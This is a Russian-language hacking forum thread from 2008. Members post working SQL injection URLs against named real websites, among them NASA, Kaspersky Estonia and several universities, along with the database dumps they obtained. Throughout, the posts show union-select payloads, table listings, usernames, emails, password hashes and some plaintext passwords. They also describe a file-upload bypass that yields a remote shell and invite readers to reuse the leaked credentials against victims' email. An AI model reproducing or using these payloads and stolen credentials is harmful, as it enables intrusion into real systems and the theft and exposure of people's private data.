http://nasaexplores.nasa.gov/show_912_teacher_st.php?id=null%27%20Union%20Selec t%20%201%20,2,3,concat_ws(char(58),user,password), 5,6,7,8,9,10,11,12,13%20,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63%20,64,65,66,67,68,69,70,7 1,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87, 88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,10 3,104,105,106,107,108,109,110,111,112,113,114,115, 116,117,118,119,120,121,122,123,124,125,126,127,12 8,129,130,131,132,133,134,135,136,137,138,139,140, 141,142,143,144,145,146,147,148,149,150,151,152,15 3,154,155,156,157,158,159,160,161,162,163,164,165, 166,167,168,169,170,171,172,173,174,175,176,177,17 8,179,180,181,182,183,184,185,186,187,188,189,190, 191,192,193,194,195,196,197,198,199,200,201+from+m ysql.user/*

Cennarios

23.09.2008, 10:02

Очередная контора делающая сайты "лучше" других...

Была найдена бага в http://www.tta.su
Функци класса concat, hex etc.. не работают, поэтому:

http://www.tta.su/infusions/my_frends_panel/messages.php?msg_send=-1+union+select+1,user_name,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24+from+tennis_us ers+limit+0,10--

http://www.tta.su/infusions/my_frends_panel/messages.php?msg_send=-1+union+select+1,user_password,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24+from+tenni s_users+limit+0,10--

login:Sam_Fox pass:42e404a41193717e192856392b2b21b6

В данном случае, имеется доступ к нескольким базам, от разных сайтов.

Поковырявшись и пораскинув мозгом, было выявлено, что среди прочих там присутствуют:

bizedu.ru
tta.su
proftests.ru
...

proftests.ru <- внутренний корпоративный сайт всей этой гоп-компании(только длясотрудников сайт).

логин и пасс, которые мы поимели с tta.su(Sam_Fox) -> подходят(админовский акк, по крайней мере этот).

Есть возможность выполнения произвольного php кода, через "администрирование контента".

R1dex

23.09.2008, 12:33

Довольно крупный игровой портал.

http://www.rolemancer.ru/article.php?sid=-1{SQLINJ}

Database Version: 4.1.7
Database name: rolemancer
User name: rolemancer@localhost

Table : users

name
pass
uname
email
uid
user_icq
user_viewemail

Table : authors

aid
email
name
pwd

ArxWolf

23.09.2008, 16:13

http://www.offsidetalk.com

http://www.offsidetalk.com/thread.php?id=22&postNum=21=null%20union%20all%20select%200,concat( version(),0x3c62723e,database(),0x3c62723e,user()) ,2,3,4,5+from+users--

version() => 5.0.67-log
database() => cosa
user() => wyrddave@edsel.dreamhost.com

БД:

cosa

Таблицы cosa:

Posts_1
Posts_10
Posts_11
Posts_12
Posts_13
Posts_14
Posts_15
Posts_16
Posts_17
Posts_18
Posts_19
Posts_2
Posts_20
Posts_21
Posts_22
Posts_23
Posts_24
Posts_25
Posts_26
Posts_27
Posts_28
Posts_29
Posts_3
Posts_30
Posts_31
Posts_32
Posts_33
Posts_34
Posts_35
Posts_36
Posts_37
Posts_38
Posts_39
Posts_4
Posts_40
Posts_41
Posts_42
Posts_43
Posts_44
Posts_45
Posts_46
Posts_47
Posts_48
Posts_49
Posts_5
Posts_50
Posts_51
Posts_52
Posts_53
Posts_54
Posts_55
Posts_56
Posts_57
Posts_58
Posts_59
Posts_6
Posts_60
Posts_61
Posts_62
Posts_63
Posts_64
Posts_65
Posts_66
Posts_67
Posts_68
Posts_7
Posts_8
Posts_9
admin
affil_lookup
amazonLinks
authorInfo
blogComments
blogComments_1
blogs
bookmarks
bugComments
bugs
colors
dailyStats
dailyThreadInfo
dailyUserStats
deadToMe
dirAffiliates
errorLog
exports_highlights
exports_subs
exports_threads
exports_users
extras
folderOrder
folders
forumPrefs
highlights
highlights_old
hits
hostedThread
imported_subs
imported_threads
ints
limeusers_config
limeusers_info
limeusers_sessions
limeusers_users
limewiki_nodehistory
limewiki_nodes
nameChange
poll_
poll__responses
poll_answers
poll_questions
pollresults_1
polls
portal_fields
portals
prefs
recent
search
sessions
subscriptions
sugComments
suggestions
taggedThreads
tags
test
testing
threadRules
threadTags
threads
time
tmp
userAccess
userStatus
user_abdabs
user_acourfoutfify
user_admin
user_affonvinevy
user_agorenbo
user_ahmadenajadsukka
user_alexisamore
user_alfpidasant
user_alladobeoemsoftdownload
user_amelyfo
user_ameshymoomy
user_andrew
user_appeaktrato
user_appefsnab
user_aromatizatorzzzy
user_ashtonmoore
user_asistond
user_avavincent
user_bakalinvadbad
user_beencydoolo
user_beishticrit
user_benderkoz
user_bestsfarmasshops
user_biidbkonudyinffh
user_billybossman
user_billyboyka
user_bionnesyslele
user_blackdog
user_blackrose
user_bligetabaiste
user_bob
user_boicioulk
user_boxvista
user_boydaytub
user_bozybouslysop
user_breelszet
user_brett
user_brianabanks
user_britneyloverii
user_brorwaypago
user_buycheapsoftwareyy
user_buycheapviagracialisss
user_buycheapviagracialiszz
user_buyviagraonlineusatoday
user_bypehyday
user_centerprestigsss
user_cesycausync
user_chaseshdstforum
user_cheapviagracialissr
user_chelle
user_chezza00
user_chezza38
user_chimchans
user_cialisbestprice
user_comprarviagraonlinejo
user_coodynexme
user_cooperbryantalwilda
user_creativeacrobate
user_designerinfo
user_dhbhsmdviu
user_diewololorled
user_djaambi11
user_donmandronas
user_donttouchmethere
user_dooguelog
user_downloadadobephotoshopfree
user_downloadcheapoemfree
user_downloadcheapoemstore
user_drakssick
user_drwebbn
user_dugmentorweb
user_dvdcattrisept
user_effikeingem
user_emonetoff
user_encotoaddet
user_entenueaccobe
user_enzytforum
user_epherfede
user_essencerec
user_esservehigo
user_eucmwtjasygck
user_eustoss
user_evellineiris
user_faidebisa
user_fartsnidatt
user_fiexindip
user_fildermac
user_flumemalp
user_foggy
user_franchesco
user_francis
user_frankexr
user_frieseejege
user_fuckahmadenagad
user_gaildclemmer
user_gapydyewere
user_genyakka
user_geoff
user_georgieworst
user_glopsipsels
user_gnomikl
user_godcousins
user_gogejeawbange
user_gokecrove
user_goldencarnns
user_gradsmrad
user_granciatskica
user_greessinise
user_gremlin
user_gremlinbug
user_handbagsro
user_hedoerromandy
user_hieplethy
user_hilmretle
user_hirefinfiploff
user_homedoctor
user_hughe
user_iambert
user_iloveme
user_inhineeideobe
user_interneprestyw
user_inzzforever
user_ireneaveline
user_jesikafclq
user_jo
user_johnnyxq
user_jono
user_kamikaze
user_kamikazekeeper
user_kamikazenutter
user_kenzy
user_kenzy10
user_kikemran
user_kildfuddy
user_krazykeeper
user_kristinavoicc
user_labudash
user_lalpdyday
user_lawotep
user_leakinmycrownjewels
user_leccepenincah
user_lelisilltoura
user_lime
user_lindmannnn
user_lingmesse
user_litantene
user_llblackslutsll
user_looreed
user_maisonvq
user_mancitymad
user_manufactureoemsoftware
user_marlborocig
user_medeqaz
user_meespalhekper
user_mefeoppongoni
user_metrocarryzjj
user_metrocashcarryry
user_metrosarrysfgt
user_mikeusay
user_milenajaf
user_mofflugsnom
user_moxeyel
user_mr
user_nat
user_niaikep
user_notasobr
user_nunziatoelizabeth
user_offleaseru
user_onepubrerib
user_onlinecialisviagrabuy
user_onpakkpwmwmvfr
user_ordervini
user_oscarjackson
user_oschepkovz
user_photoshopadob
user_phydaysteesty
user_pikolezaks
user_pluslondoms
user_polmangirl
user_portjassica
user_prestigesmwm
user_privettutja
user_promskladstanki
user_puzobok
user_rabbit70
user_randyspears
user_reibrawhite
user_rensiobbips
user_samantharo
user_sateliterus
user_satuedeclelve
user_scarletmillie
user_selpkeemi
user_serga
user_sexmastergb
user_sextube
user_shancyvagnene
user_sheridansup
user_shurfastifift
user_sizeaspem
user_skvbirzharu
user_sonserryvierohome
user_srmt
user_sselldumps
user_stafkolter
user_stankotorgforum
user_strongjannabiz
user_suiquehig
user_supunmano
user_tanyalarina
user_tarfbrefemebyv
user_taupdaptoks
user_tedvatcatitest
user_testyjo
user_thegoalie
user_thegoalie2
user_thomas1
user_tipokotpu
user_tosifers
user_towtucttons
user_trastuso
user_tritinvallemn
user_twntysevnbase
user_viagrabuycheapestvigras
user_viagracheaprice
user_viagracialislischeapest
user_vistaultimatedownloadapro
user_voliidiowly
user_wepallomo
user_westomkew
user_wyrddave
user_xolonho
user_yongbers
user_youngic
user_yrealmale
user_zalivaika
users[password, email]
violations

Закалибался выковыривать )) 371 таблица..
Можно сделать отличный дамп.
+ мну...

http://csteachers.org

http://csteachers.org/thread.php?id=4&postNum=3=null%20union%20all%20select%200,concat(v ersion(),0x3c62723e,database(),0x3c62723e,user()), 2,3,4,5--

version() => 4.1.16-standard-log
database() => csteachers
user() => csteachers@jmkdb.theperfectworld.us

groupby

23.09.2008, 22:06

MySQL: 5.0.51a-log
DBASE: host1843
USER: host1843@10.7.0.2
_http://www.nord-east.ru/index.php?id=-1%20union%20select%201,concat_ws(char(58),login,pa ss),3,4%20from%20auth%20--
Админку не нашел (

$n@ke

23.09.2008, 22:54

http://www.smf.org.uk/events.php?section_id=4

Dbname: smforg_smf
Version: 4.1.22-standard
Username: smforg_smforg@localhost

groups
members
users

slider

24.09.2008, 15:25

Ассоциация выпускников Международной стипендии Президента Республики Казахстан «Болашак» o_O

http://www.bolashak.kz/?lang=ru&type=news&id=-46+union+select+1,2,version(),4,5,6,7,8+from+phpbb _users/*

p.s : таблы заебся подбирать, там есть форум phpbb но что то мне подсказывает что всё зранится в разных базах...

$n@ke

24.09.2008, 19:50

http://www.dwaa.org.uk/showevent.php?eventID=25UNION+SELECT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37+LIMIT+1,1/*

Dbname: dwaa
Version: 4.1.18
Username: janet@localhost
================================================== =========
http://www.pemadam.org.my/cda/m_counselling/csl_view.php?id=86UNION+SELECT+1+LIMIT+1,1/*&crumb=MIZ.NAA

и снова 4 ((
Dbname: pemadam_06
Version: 4.1.7-nt
Username: pemadam_cc@localhost

0nep@t0p

24.09.2008, 20:07

www.novirealty.ca
http://www.novirealty.ca/waterfront.php?fid=510/**/union/**/select/**/1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5 2,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68, 69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85 ,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101 ,102,103,104,105,106,107,108,109,110,111,112,113,1 14,115,116,117,118,119,120,121,122,123,124,125,126 ,127,128,129,130,131,132,133,134,135,136,137,138,1 39,140,141,142,143,144,145,146,147,148,149,150,151 ,152,153,154,155,156,157,158,159,160,161,162,163,1 64,165,166,167,168,169/*&page=2

Version: 4.1.20
User: f1shst1cks@localhost
=/

Pashkela

24.09.2008, 20:20

Ассоциация выпускников Международной стипендии Президента Республики Казахстан «Болашак» o_O

p.s : таблы заебся подбирать, там есть форум phpbb но что то мне подсказывает что всё зранится в разных базах...

может все-таки так?

http://www.bolashak.kz/?lang=ru&type=news&id=-46+union+select+1,2,version(),4,5,6,7,8/*

AFoST

24.09.2008, 23:02

safe-shop.ru

http://www.safe-shop.ru/indx.php?c=articles&id=2+and+1=0+union+select+1,2,concat(user(),0x20,v ersion(),0x20,database()),4+--
u8606@10.10.10.205 5.0.67-log u8606_2

1.from_kp
1.1 id
1.2 ip
1.3 dates
1.4 http_from
2.kv
2.1 id
2.2 pole
2.3 pole2
3.kv_gr
4.kv_instr
5.kv_maingr
6.kv_news
7.kv_ss
7.1 id
7.2 name
7.3 prior
7.4 time_id
8.kv_st

Pashkela

24.09.2008, 23:35

http://www.dwaa.org.uk/showevent.php?eventID=25UNION+SELECT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37+LIMIT+1,1/*

Цитата:Dbname: dwaa
Version: 4.1.18
Username: janet@localhost

Если посмотреть вниз, то там написано:
Parts powered by WordPress

Нашлось - таблица: wp_users
Поля: id,user_aim,user_email,user_icq,user_ip

groupby

24.09.2008, 23:35

4я версия мускула, так что выудить мало чего получается.
Нашел таблицу users. Есть поля id, email. Другие подобрать не смог.
Подозреваю, что из этой таблицы производится вход в
http://sales.conkurent.com/affiliates/index.php
Вот скуля:
http://conkurent.com/news.php?id=4%20union%20select%201,2,3,concat_ws(c har(58),id,email),5%20from%20users/*

Pashkela

25.09.2008, 00:04

2 groupby:

есть еще:

таблица:

news, поле id
settings, поле name
users, поля: email, id, status

luz3r

25.09.2008, 00:19

http://www.casinoratgeber.com/index.php?bid=-3+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18+from+information_schema.tables+

Ponchik

25.09.2008, 01:45

Искал где поиграть в билот, билот не нащёл, но со скулей поигрался :D
http://www.gambler.ru/tours/protocol.php?tourid=129903&teamid=-1+UNION+SELECT+1,concat_ws(0x3a,VERSION(),USER(),D ATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--
5.0.51a-log:gambread@localhost:gambler

KPOT_f!nd

25.09.2008, 02:24

http://www.dddhouse.com/v3/product_list.php?CategoryID=-1/**/union/**/select/**/1,1,1,1,1,1,1,1/*

http://www.ransomesjacobsen.com/product_list.php?t=category&id=-3+union+select+1,2/*

http://california.preferredjobs.com/profiles/profilesubmitrez.asp?number=1+or+1=(SELECT+TOP+1+P assword+from+artUsersAdmin))--

Таблицы
syssegments
sysconstraints
jobs
websjobads
ASPLoginUserTbl
JobFair
affiliates
approved_jobs
Articles
artUsers
artUsersAdmin
builderjobs
categories
Comments
dtproperties
email
employers
employers_old
interns
JobFair2
jobs2
jobscats
jobsstored
jobstemp
messages
Months
newsletter
numberjobs
Posts
rbe
rls_jobs
unapproved_jobs
unpaid_affiliates
USER_NOTE
USER_SEARCH
USER_WISH
webs

3xIm3

25.09.2008, 07:40

http://www.pku.org/pages/news.php?id=408+UNION+SELECT+1,2,concat_ws(0x3a,pa ssword,email)+FROM+member/*
4.1.22-standard:pku_@localhost:pku_db1

http://www.aupe.org/in_the_news/news.php?id=-96+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,CONCAT_WS(0x3a,version(),user(),databas e()),20,21/*
4.0.18:root@localhost:aupe

http://www.globalwaterfoundation.org/news.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3a,VERSION(),USER() ,DATABASE())/*
VERSION 5

3xIm3

25.09.2008, 08:14

http://www.greenecountyfoundation.org/news.php?id=-10+union+select+1,2,version(),4,5--
5.0.51a-community-log

Iceangel_

25.09.2008, 09:18

http://www.tgchat.co.uk/profile.php?id=-146+union+select+1,version(),3,4,5,6,7,8,9,10,11/*
5.0.45

некоторые таблицы...

PrivatePictures
new_access
new_authmap
new_filters
new_forum
new_profile_fields
new_profile_values
new_system
new_users

-----------
http://www.fergusonhill.co.uk/product_details.php?id=7+union+select+1,2,3,4,5,6, 7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
4.1.22-standard
-----------
http://www.forensicrecords.co.uk/artistdetail.php?id=-216+union+select+1,version(),3,4/*
5.0.27
----------
http://www.welovemarlborough.co.uk/marlborough_news.php?id=-88++union+select+1,password,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+us ers/*
----------
http://fat-cat.co.uk/fatcat/artistInfo.php?id=-53++union+select+1,login,3,4,5,6,7+from+users/*
iwantiwantiwant:Seiji25x
----------
mysql.user:
root:*5D769374F92AB78666CB6CDADBE62DB99DBE8411
----------
http://www.snseurope.com/snslink/news/news-full.php?id=-3565+union+select+1,2,3,4,5,concat(username,0x3a,p assword),7,8,9,10,11,12,13,14,15,16,17,18,19,20+fr om+users/*

$n@ke

25.09.2008, 17:03

http://www.mayores.uji.es/canal.php?id=152[sql]

Dbname: mayores
Version: 5.0.20a-log
User: mayores@localhost

http://www.mayores.uji.es/joomla/
http://www.mayores.uji.es/forum/

Table [mayores]
Table [canales]
Table [documentos]
Table [drupal_access]
Table [drupal_accesslog]
Table [drupal_actions]
Table [drupal_actions_aid]
Table [drupal_aggregator_category]
Table [drupal_aggregator_category_feed]
Table [drupal_aggregator_category_item]
Table [drupal_aggregator_feed]
Table [drupal_aggregator_item]
Table [drupal_authmap]
Table [drupal_batch]
Table [drupal_blocks]
Table [drupal_blocks_roles]
Table [drupal_boxes]
Table [drupal_cache]
Table [drupal_cache_block]
Table [drupal_cache_filter]
Table [drupal_cache_form]
Table [drupal_cache_menu]
Table [drupal_cache_page]
Table [drupal_cache_update]
Table [drupal_comments]
Table [drupal_files]
Table [drupal_filter_formats]
Table [drupal_filters]
Table [drupal_flood]
Table [drupal_history]
Table [drupal_languages]
Table [drupal_locales_source]
Table [drupal_locales_target]
Table [drupal_menu_custom]
Table [drupal_menu_links]
Table [drupal_menu_router]
Table [drupal_node]
Table [drupal_node_access]
Table [drupal_node_comment_statistics]
Table [drupal_node_counter]
Table [drupal_node_revisions]
Table [drupal_node_type]
Table [drupal_permission]
Table [drupal_poll]
Table [drupal_poll_choices]
Table [drupal_poll_votes]
Table [drupal_role]
Table [drupal_search_dataset]
Table [drupal_search_index]
Table [drupal_search_node_links]
Table [drupal_search_total]
Table [drupal_sessions]
Table [drupal_system]
Table [drupal_term_data]
Table [drupal_term_hierarchy]
Table [drupal_term_node]
Table [drupal_term_relation]
Table [drupal_term_synonym]
Table [drupal_upload]
Table [drupal_url_alias]
Table [drupal_users]
Table [drupal_users_roles]
Table [drupal_variable]
Table [drupal_vocabulary]
Table [drupal_vocabulary_node_types]
Table [drupal_watchdog]
Table [enc_encuestas]
Table [enc_preguntas]
Table [enc_respuestas]
Table [enc_valores]
Table [foros_foros]
Table [foros_moderadores]
Table [foros_temas]
Table [foros_textos_tema]
Table [joomla_banner]
Table [joomla_bannerclient]
Table [joomla_bannertrack]
Table [joomla_categories]
Table [joomla_components]
Table [joomla_contact_details]
Table [joomla_content]
Table [joomla_content_frontpage]
Table [joomla_content_rating]
Table [joomla_core_acl_aro]
Table [joomla_core_acl_aro_groups]
Table [joomla_core_acl_aro_map]
Table [joomla_core_acl_aro_sections]
Table [joomla_core_acl_groups_aro_map]
Table [joomla_core_log_items]
Table [joomla_core_log_searches]
Table [joomla_custom_properties]
Table [joomla_custom_properties_fields]
Table [joomla_custom_properties_values]
Table [joomla_easybook]
Table [joomla_easybook_badwords]
Table [joomla_easycaptcha_config]
Table [joomla_easycaptchas]
Table [joomla_easycaptchas_dpaulus]
Table [joomla_easycaptchas_secimg]
Table [joomla_easycomments]
Table [joomla_easygb]
Table [joomla_groups]
Table [joomla_idoblog_comments]
Table [joomla_idoblog_friends]
Table [joomla_idoblog_tags]
Table [joomla_idoblog_tags_reffer]
Table [joomla_idoblog_user_reffer]
Table [joomla_idoblog_users]
Table [joomla_ja_acl]
Table [joomla_ja_captcha]
Table [joomla_jce_extensions]
Table [joomla_jce_groups]
Table [joomla_jce_plugins]
Table [joomla_joomla_flash_uploader]
Table [joomla_joomla_flash_uploader_conf]
Table [joomla_joomla_flash_uploader_user]
Table [joomla_menu]
Table [joomla_menu_types]
Table [joomla_messages]
Table [joomla_messages_cfg]
Table [joomla_migration_backlinks]
Table [joomla_modules]
Table [joomla_modules_menu]
Table [joomla_newsfeeds]
Table [joomla_plugins]
Table [joomla_poll_data]
Table [joomla_poll_date]
Table [joomla_poll_menu]
Table [joomla_polls]
Table [joomla_sections]
Table [joomla_session]
Table [joomla_stats_agents]
Table [joomla_templates_menu]
Table [joomla_users]
Table [joomla_weblinks]
Table [joomla_yvcomment]
Table [mc_accesos]
Table [mc_chat]
Table [phpbb_auth_access]
Table [phpbb_banlist]
Table [phpbb_categories]
Table [phpbb_config]
Table [phpbb_confirm]
Table [phpbb_disallow]
Table [phpbb_forum_prune]
Table [phpbb_forums]
Table [phpbb_groups]
Table [phpbb_posts]
Table [phpbb_posts_text]
Table [phpbb_privmsgs]
Table [phpbb_privmsgs_text]
Table [phpbb_ranks]
Table [phpbb_search_results]
Table [phpbb_search_wordlist]
Table [phpbb_search_wordmatch]
Table [phpbb_sessions]
Table [phpbb_sessions_keys]
Table [phpbb_smilies]
Table [phpbb_themes]
Table [phpbb_themes_name]
Table [phpbb_topics]
Table [phpbb_topics_watch]
Table [phpbb_user_group]
Table [phpbb_users]
Table [phpbb_vote_desc]
Table [phpbb_vote_results]
Table [phpbb_vote_voters]
Table [phpbb_words]
Table [portada]
Table [tablon]

xcedz

25.09.2008, 19:51

помогите заюзать http://ktools.net/news_detail.php?nid=' нужно вытащить двиги которые продаются
http://ktools.net/news_detail.php?nid=999+union+select+1,version(),3 ,4,5--

четверка :) дело времени а вообще молодой человек тут не место для вопросов (в этом топе)

je0n

26.09.2008, 00:17

http://www.kaspersky.ee/ ля-ля-ля
http://www.kaspersky.ee/index.php?area=1&p=gallery&action=showimages&galid=-1+union+select+0,concat_ws(0x2F,uname,email,pass), 2+from+kpro_user+where+ugroup=1+limit+0,1
http://www.kaspersky.ee/admin/
leroi/leroi@starman.ee/c263dbf51a63271ae226609fc8d8cace:star59
vasja/toivo.peegel@kaspersky.ee/046833087b7f4017c7e9c9644176fed1
kaspersky/eugene.savitsky@kaspersky.ee/92b36ff295fc38a4a2e773e19d6b3b34
sky_pets/sky@pets.ee/cb2513e0bbfc31544af7948592527bd0
kass_ru/pjotr.tsvetkov@menelon.ee/7c3d596ed03ab9116c547b0eb678b247:aaaaaa

3xIm3

26.09.2008, 03:49

http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/VERSION(),2,3/**/LIMIT/**/1,1/*5.0.32-Debian_7etch6-log

http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3A,user_nom,user_pwd),2,3/**/FROM/**/dc_user/**/LIMIT/**/1,1/*admin:kelbike1 админку не нашел

http://www.hrusa.org/field/listings.php?catid=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4/*5.0.45:hrusa@lawweb2-private:hrusa

http://www.hrusa.org/field/listings.php?catid=-1+union+select+concat_ws(0x3a,name,password),2,3,4 +FROM+users+limit+0,1/*admin:hrcalendar к админке не подходит

Iceangel_

26.09.2008, 19:30

хекаем .edu
на всех 5-я версия мускула...

http://www.stots.edu/article.php?id=-46+union+select++1,2,concat(user,0x3a,password,0x3 a,host),4,5,6,7,8+from+mysql.user+limit+1,1/*
5.0.27-standard
в теме "Расшифровка хешей" я выкладывал выуженные хеши, там даже мне их частично расшифровали...

http://www.psych.utah.edu/people/gradstud.php?id=-131+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,15, 16,17,18/*
5.0.22-log 3

http://dma.ucla.edu/people/faculty.php?ID=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
5.0.45 4

groupby

27.09.2008, 02:20

итак. Нашел я сайтик: http://baltportal.ru

Общая инфа:

MySQL version: 5.0.51a-community
MySQL user: nwlove_baltru@localhost
MySQL database: nwlove_baltru

Таблицы:

_news
_news_comm
_news_type
active_session
auth_user
banks
banks_cat
cash
dt_anekdot
dt_city
dt_notice
faq
help
log_stat
portals
reklama
types
types_rights
vote
vote_answer
vote_ask
vote_votes

Некоторые поля из талицы auth_user: name, nik, password, admin, email
Чувак, который походу админ: Дмитрий Шахов1,
Администратор, pwdportalpwd, msa@dimsign.ru

Не знаю почему, но с этими данными админский доступ получить не смог (.
Я не отчаялся. Получил пользовательский доступ и пошел рыть дальше.
В редактировании профиля предлагается загрузить картинку. Если ты грузишь не картинку а пхп-файл, то это жестко пресекается ))) А если файл назвать не файл.пхп, а файл.жпг.пхп, то все чудесно проходит и ты получаешь удаленный шелл. Проблема только в том, что у этого шела права ограниченные (видимо там права более менее нормально на папку с картинками настроили).
В общем если кто-то чего-то дальше раскопает тут, буду рад получить доп. инфу в личку.
Кстати, если кому-то нужна программа для ускорения поиска таблиц и генерации инъекций, пишите в личку (SQLInjectHelper).

slider

27.09.2008, 07:11

http://mobila.kz

вообщемс... там весь сайт ... одна большая скуля.....
удобный вывод в цикле .. не может не порадовать глаз....

http://mobila.kz/item_pop_up.php?item_id=-852+union+select+1,2,3,4,5,6,7

http://mobila.kz/item_pop_up.php?item_id=-6+union+select+1,2,3,4,5,column_name,7+from+inform ation_schema.columns+where+table_name=char(115,98, 115,95,117,115,101,114)

PR тИЦ Alexa
3 20 1773095

USAkid

27.09.2008, 12:14

БЕЛОРУССКАЯ АССОЦИАЦИЯ СОЦИАЛЬНЫХ РАБОТНИКОВ

http://basw-ngo-by.net/

Фух бла, ну и заепался я его исследовать. Таблицы какие-то странные ваще вконце пошли. Но сам результат:

http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,version(),4,5,6,7,8 ,9,10,11,12--

5.0.51a-community-log

Таблиц всего 59 насчитал. Перечислять тут небуду, т.к. займет много места)

Главное - в таблице basw_ru_subscribers был обнаружен столбец - pass. Чем она собсна мя и заинтересовала:

http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,column_name,4,5,6,7 ,8,9,10,11,12+from+information_schema.columns+wher e+table_name=0x626173775f72755f7375627363726962657 273+limit+0,1--

id
name
last_name
email
pass
group2
name_org
time

http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,concat_ws(id,0x3a,n ame,0x3a,pass),4,5,6,7,8,9,10,11,12+from+basw_ru_s ubscribers+limit+0,1--

Ну и пошли логины и пассы (в открытом виде) :)

Раз сайт "Ассоциация.....", то вполне возможно ассоциировать етот пароль с настоящим мылом. Кому захочется - пробуйте :)

iddqd

27.09.2008, 12:44

knock.lv - интернет-магазин.

5.0.51a-community:knok_knock@localhost:knok_knock

http://www.knock.lv/view_more.php?action=view_s&product_id=269+union+select+1,2,3,concat_ws(0x3a,u sername,password),5,6,7,8,9,10+from+users--

$n@ke

27.09.2008, 13:45

www.migranews.it PR 6
http://www.migranews.it/stampaart.php?indice=729[sql]
Version: 5.0.67
Dbname: migranews_it
Username: 75239472@domweb-4.eu.tiscali.sys

table login
migra : prova

luz3r

27.09.2008, 14:17

http://blueshop.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25+from+infor mation_schema.tables--

luz3r

27.09.2008, 14:40

http://www.vzmakh.ru/b_sh/fotki1.php?novost=-1+UNION+SELECT+1,user()--
dbu_vzmakh_2@192.168.7.97

http://www.vzmakh.ru/b_sh/fotki1.php?novost=-1+UNION+SELECT+1,version()--

4.1.22

luz3r

27.09.2008, 14:58

http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230+union+select+1,2,3,4,table_name,6,7 ,8,9,10,11+from+information_schema.tables+limit+1, 1--
- COLLATIONS
- COLLATION_CHARACTER_SET_APPLICABILITY
- COLUMNS
- COLUMN_PRIVILEGES
- ENGINES
- EVENTS
- FILES
- GLOBAL_STATUS
- GLOBAL_VARIABLES
- KEY_COLUMN_USAGE
- PARTITIONS
- PLUGINS
- PROCESSLIST
- REFERENTIAL_CONSTRAINTS
...
- USERS

http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230+union+select+1,2,3,4,column_name,6, 7,8,9,10,11+from+information_schema.columns+where+ table_name=0x7573657273+limit+1,1--
А вот и поля.. :
- login
- passwd
- fio
- fname
- ffname
- sname
- company
- dolj
- sex
- country
- region
- address
- telephone
- fax
- email
- url
дальше не стал...

http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230+union+select+1,2,3,4,concat_ws(0x3a ,login,passwd,email),6,7,8,9,10,11+from+users+limi t+1,1--

Пароли в открытом виде...
Приведу парочку
№ login : pass : mail

1) Bear:igor2001:igor@bis-el.kiev.ua
2) pavel_m@bis-el.kiev.ua:pasha:уже писал - (тут логин и есть мыло)
3) artemk:234:artemk@bis-el.kiev.ua
4) Alex:king:alexander@bis-el.kiev.ua

Авторизация тут (http://www.bis-el.kiev.ua/start.php?part_id=2)

luz3r

27.09.2008, 15:24

http://quiddich.voldemort.ru/forum.php?forum=16&sid=&skey=&topic=-599+union+select+1,version(),3,4,5,6,7,8,9/*
4.1.22

S00pY

27.09.2008, 17:02

http://www.bt-shop.ru/section_output.php?id=-1+union+select+1,2,3,version(),5,6,7/*
version:4
http://www.intexusa.ru/forum/read.php?id=99999999999+union+select+1,2,3,4,5,6,7--
Нет принтабельных

http://www.lory-press.ru/book.php?id=1+and+substring(@@version,1,1)=3
version:3

3xIm3

28.09.2008, 02:19

http://www.pku.org/pages/news.php?id...cat_ws(0x3a,pa ssword,email)+FROM+member--

http://www.snseurope.com/snslink/new...17,18,19,20+fr om+users--

http://www.stots.edu/article.php?id=...a,password,0x3 a,host),4,5,6,7,8+from+mysql.user+limit+1,1--

lstsgoman

28.09.2008, 03:10

Позходу дела большая бАза рефератов :)

ТИЦ 350

http://doklad.ru/referat.php?id_ref=-1+union+select+1,2,3,DAT ABASE(),USER(),6,7,8,9,10

